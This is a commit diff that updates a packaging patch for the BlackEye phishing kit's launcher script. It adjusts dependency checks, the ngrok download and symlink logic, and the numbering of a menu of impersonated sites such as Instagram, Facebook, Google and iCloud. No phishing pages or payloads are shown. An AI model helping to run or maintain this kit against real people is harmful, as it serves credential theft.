switch to current fork

diff --git a/blackeye.patch b/blackeye.patch
--- a/blackeye.patch
+++ b/blackeye.patch
@@ -1,46 +1,66 @@
 diff -ru --color old/blackeye.sh new/blackeye.sh
---- old/blackeye.sh	2020-12-12 19:37:48.130378733 +0100
-+++ new/blackeye.sh	2020-12-12 19:50:22.552417197 +0100
-@@ -10,7 +10,7 @@
+--- old/blackeye.sh	2020-12-19 21:16:48.990415929 +0100
++++ new/blackeye.sh	2020-12-19 21:34:52.926612866 +0100
+@@ -9,43 +9,25 @@
+ # TrapControl
+ trap 'printf "\n";stop;exit 1' 2
+ 
+-# Ensure system knows where blackeye directory was installed.
+-if [[ ! -f '~/.local/.be_dir' ]]; then
+-  LDIR=$(pwd)
+-  echo ${LDIR} > ~/.local/.be_dir
+-fi
+-
+-# When launched if CLI is not in Blackeye directory it will change to where user has installed it.
+-WDIR=$(cat ~/.local/.be_dir)
+-cd ${WDIR}
+-
+-# Adds Blackeye to Path
+-if [[ ! -f '/usr/sbin/blackeye' ]]; then
+-  sudo cp blackeye.sh /usr/sbin/blackeye
+-  sudo chmod +x /usr/sbin/blackeye
+-  sudo chown $USER:$USER /usr/sbin/blackeye
+-fi
+-## Blackeye can now be started from anywhere by running 'blackeye'
+-
+ # Dependancy Check
  dependencies() {
+   command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
+-  command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
++  { command -v wget || command -v ngrok; } > /dev/null 2>&1 || { echo >&2 "I require either ngrok or wget but neither of them is installed. Install one of those. Aborting."; exit 1; }
+   command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
+   command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Install it. Aborting."; exit 1; }
+ }
  
- command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
--command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
-+{ command -v wget || command -v ngrok; } > /dev/null 2>&1 || { echo >&2 "I require either ngrok or wget but neither of them is installed. Install one of those. Aborting."; exit 1; }
- command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
- command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Install it. Aborting."; exit 1; }
+ # Option Menu
+ menu(){
+-  echo -e "          ${BC}01${AC} Instagram ${NC}       ${BC}17${AC} DropBox ${NC}        ${BC}33${AC} eBay ${NC}"
+-  echo -e "          ${BC}02${AC} FaceBook ${NC}        ${BC}18${AC} Adobe ID ${NC}       ${BC}34${AC} Amazon ${NC}"
+-  echo -e "          ${BC}03${AC} SnapChat ${NC}        ${BC}19${AC} Shopify ${NC}        ${BC}35${AC} iCloud ${NC}"
+-  echo -e "          ${BC}04${AC} Twitter ${NC}         ${BC}20${AC} Messenger ${NC}      ${BC}36${AC} Spotify ${NC}"
+-  echo -e "          ${BC}05${AC} Github ${NC}          ${BC}21${AC} GitLab ${NC}         ${BC}37${AC} Netflix ${NC}"
+-  echo -e "          ${BC}06${AC} Google ${NC}          ${BC}22${AC} Twitch ${NC}         ${BC}38${AC} Custom ${NC}"
+-  echo -e "          ${BC}07${AC} Origin ${NC}          ${BC}23${AC} MySpace ${NC}        ${BC}**${AC} Extra Tools ${NC}"
+-  echo -e "          ${BC}08${AC} Yahoo ${NC}           ${BC}24${AC} Badoo ${NC}          ${BC}39${AC} CamPhish ${NC}"
+-  echo -e "          ${BC}09${AC} LinkedIn ${NC}        ${BC}25${AC} VK ${NC}             ${BC}40${AC} LostPass ${NC}"
++  echo -e "          ${BC} 1${AC} Instagram ${NC}       ${BC}17${AC} DropBox ${NC}        ${BC}33${AC} eBay ${NC}"
++  echo -e "          ${BC} 2${AC} FaceBook ${NC}        ${BC}18${AC} Adobe ID ${NC}       ${BC}34${AC} Amazon ${NC}"
++  echo -e "          ${BC} 3${AC} SnapChat ${NC}        ${BC}19${AC} Shopify ${NC}        ${BC}35${AC} iCloud ${NC}"
++  echo -e "          ${BC} 4${AC} Twitter ${NC}         ${BC}20${AC} Messenger ${NC}      ${BC}36${AC} Spotify ${NC}"
++  echo -e "          ${BC} 5${AC} Github ${NC}          ${BC}21${AC} GitLab ${NC}         ${BC}37${AC} Netflix ${NC}"
++  echo -e "          ${BC} 6${AC} Google ${NC}          ${BC}22${AC} Twitch ${NC}         ${BC}38${AC} Custom ${NC}"
++  echo -e "          ${BC} 7${AC} Origin ${NC}          ${BC}23${AC} MySpace ${NC}        ${BC}**${AC} Extra Tools ${NC}"
++  echo -e "          ${BC} 8${AC} Yahoo ${NC}           ${BC}24${AC} Badoo ${NC}          ${BC}39${AC} CamPhish ${NC}"
++  echo -e "          ${BC} 9${AC} LinkedIn ${NC}        ${BC}25${AC} VK ${NC}             ${BC}40${AC} LostPass ${NC}"
+   echo -e "          ${BC}10${AC} Protonmail ${NC}      ${BC}26${AC} Yandex ${NC}         ${BC}41${AC} PhishMailer ${NC}"
+   echo -e "          ${BC}11${AC} Wordpress ${NC}       ${BC}27${AC} DevianART ${NC}      ${BC}42${AC} HackerPro ${NC}"
+   echo -e "          ${BC}12${AC} Microsoft ${NC}       ${BC}28${AC} Wi-Fi ${NC}      "       #${BC}01${AC} ?? ${NC}
+@@ -57,7 +39,7 @@
+   read -p $'\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Choose an option: \e[0m\en' option
  
-@@ -18,15 +18,15 @@
- 
- menu() {
- 
--printf "          \e[1;92m[\e[0m\e[1;77m01\e[0m\e[1;92m]\e[0m\e[1;91m Instagram\e[0m      \e[1;92m[\e[0m\e[1;77m17\e[0m\e[1;92m]\e[0m\e[1;91m DropBox\e[0m        \e[1;92m[\e[0m\e[1;77m33\e[0m\e[1;92m]\e[0m\e[1;91m eBay\e[0m               \n"                                
--printf "          \e[1;92m[\e[0m\e[1;77m02\e[0m\e[1;92m]\e[0m\e[1;91m Facebook\e[0m       \e[1;92m[\e[0m\e[1;77m18\e[0m\e[1;92m]\e[0m\e[1;91m Adobe ID   \e[0m    \e[1;92m[\e[0m\e[1;77m34\e[0m\e[1;92m]\e[0m\e[1;91m Amazon\e[0m         \n"
--printf "          \e[1;92m[\e[0m\e[1;77m03\e[0m\e[1;92m]\e[0m\e[1;91m Snapchat\e[0m       \e[1;92m[\e[0m\e[1;77m19\e[0m\e[1;92m]\e[0m\e[1;91m Shopify   \e[0m     \e[1;92m[\e[0m\e[1;77m35\e[0m\e[1;92m]\e[0m\e[1;91m iCloud\e[0m          \n"
--printf "          \e[1;92m[\e[0m\e[1;77m04\e[0m\e[1;92m]\e[0m\e[1;91m Twitter\e[0m        \e[1;92m[\e[0m\e[1;77m20\e[0m\e[1;92m]\e[0m\e[1;91m Messenger   \e[0m   \e[1;92m[\e[0m\e[1;77m36\e[0m\e[1;92m]\e[0m\e[1;91m Spotify\e[0m          \n"                
--printf "          \e[1;92m[\e[0m\e[1;77m05\e[0m\e[1;92m]\e[0m\e[1;91m Github\e[0m         \e[1;92m[\e[0m\e[1;77m21\e[0m\e[1;92m]\e[0m\e[1;91m GitLab   \e[0m      \e[1;92m[\e[0m\e[1;77m37\e[0m\e[1;92m]\e[0m\e[1;91m Netflix\e[0m          \n"                
--printf "          \e[1;92m[\e[0m\e[1;77m06\e[0m\e[1;92m]\e[0m\e[1;91m Google\e[0m         \e[1;92m[\e[0m\e[1;77m22\e[0m\e[1;92m]\e[0m\e[1;91m Twitch   \e[0m      \e[1;92m[\e[0m\e[1;77m38\e[0m\e[1;92m]\e[0m\e[1;91m Custom\e[0m         \n"
--printf "          \e[1;92m[\e[0m\e[1;77m07\e[0m\e[1;92m]\e[0m\e[1;91m Origin\e[0m         \e[1;92m[\e[0m\e[1;77m23\e[0m\e[1;92m]\e[0m\e[1;91m MySpace    \e[0m             \n"
--printf "          \e[1;92m[\e[0m\e[1;77m08\e[0m\e[1;92m]\e[0m\e[1;91m Yahoo\e[0m          \e[1;92m[\e[0m\e[1;77m24\e[0m\e[1;92m]\e[0m\e[1;91m Badoo   \e[0m                \n"        
--printf "          \e[1;92m[\e[0m\e[1;77m09\e[0m\e[1;92m]\e[0m\e[1;91m Linkedin\e[0m       \e[1;92m[\e[0m\e[1;77m25\e[0m\e[1;92m]\e[0m\e[1;91m VK   \e[0m                   \n"         
-+printf "          \e[1;92m[\e[0m\e[1;77m 1\e[0m\e[1;92m]\e[0m\e[1;91m Instagram\e[0m      \e[1;92m[\e[0m\e[1;77m17\e[0m\e[1;92m]\e[0m\e[1;91m DropBox\e[0m        \e[1;92m[\e[0m\e[1;77m33\e[0m\e[1;92m]\e[0m\e[1;91m eBay\e[0m               \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 2\e[0m\e[1;92m]\e[0m\e[1;91m Facebook\e[0m       \e[1;92m[\e[0m\e[1;77m18\e[0m\e[1;92m]\e[0m\e[1;91m Adobe ID   \e[0m    \e[1;92m[\e[0m\e[1;77m34\e[0m\e[1;92m]\e[0m\e[1;91m Amazon\e[0m         \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 3\e[0m\e[1;92m]\e[0m\e[1;91m Snapchat\e[0m       \e[1;92m[\e[0m\e[1;77m19\e[0m\e[1;92m]\e[0m\e[1;91m Shopify   \e[0m     \e[1;92m[\e[0m\e[1;77m35\e[0m\e[1;92m]\e[0m\e[1;91m iCloud\e[0m          \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 4\e[0m\e[1;92m]\e[0m\e[1;91m Twitter\e[0m        \e[1;92m[\e[0m\e[1;77m20\e[0m\e[1;92m]\e[0m\e[1;91m Messenger   \e[0m   \e[1;92m[\e[0m\e[1;77m36\e[0m\e[1;92m]\e[0m\e[1;91m Spotify\e[0m          \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 5\e[0m\e[1;92m]\e[0m\e[1;91m Github\e[0m         \e[1;92m[\e[0m\e[1;77m21\e[0m\e[1;92m]\e[0m\e[1;91m GitLab   \e[0m      \e[1;92m[\e[0m\e[1;77m37\e[0m\e[1;92m]\e[0m\e[1;91m Netflix\e[0m          \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 6\e[0m\e[1;92m]\e[0m\e[1;91m Google\e[0m         \e[1;92m[\e[0m\e[1;77m22\e[0m\e[1;92m]\e[0m\e[1;91m Twitch   \e[0m      \e[1;92m[\e[0m\e[1;77m38\e[0m\e[1;92m]\e[0m\e[1;91m Custom\e[0m         \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 7\e[0m\e[1;92m]\e[0m\e[1;91m Origin\e[0m         \e[1;92m[\e[0m\e[1;77m23\e[0m\e[1;92m]\e[0m\e[1;91m MySpace    \e[0m             \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 8\e[0m\e[1;92m]\e[0m\e[1;91m Yahoo\e[0m          \e[1;92m[\e[0m\e[1;77m24\e[0m\e[1;92m]\e[0m\e[1;91m Badoo   \e[0m                \n"
-+printf "          \e[1;92m[\e[0m\e[1;77m 9\e[0m\e[1;92m]\e[0m\e[1;91m Linkedin\e[0m       \e[1;92m[\e[0m\e[1;77m25\e[0m\e[1;92m]\e[0m\e[1;91m VK   \e[0m                   \n"
- printf "          \e[1;92m[\e[0m\e[1;77m10\e[0m\e[1;92m]\e[0m\e[1;91m Protonmail\e[0m     \e[1;92m[\e[0m\e[1;77m26\e[0m\e[1;92m]\e[0m\e[1;91m Yandex   \e[0m               \n"
- printf "          \e[1;92m[\e[0m\e[1;77m11\e[0m\e[1;92m]\e[0m\e[1;91m Wordpress\e[0m      \e[1;92m[\e[0m\e[1;77m27\e[0m\e[1;92m]\e[0m\e[1;91m devianART   \e[0m            \n"
- printf "          \e[1;92m[\e[0m\e[1;77m12\e[0m\e[1;92m]\e[0m\e[1;91m Microsoft\e[0m      \e[1;92m[\e[0m\e[1;77m28\e[0m\e[1;92m]\e[0m\e[1;91m Wi-Fi   \e[0m                \n"
-@@ -392,7 +392,7 @@
- fi
- 
- 
--if [[ -e ngrok ]]; then
-+if [[ -e ngrok ]] || ln -s "$(type -P ngrok)" ./; then
- echo ""
- else
- 
+   # Ngrok Auth Validation
+-  if [[ ! -f 'ngrok' ]]; then
++  if [[ ! -f 'ngrok' ]] && ! ln -s "$(type -P ngrok)" ./ 2>/dev/null; then
+     wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
+     unzip ngrok-stable-linux-amd64.zip
+     rm ngrok-stable-linux-amd64.zip
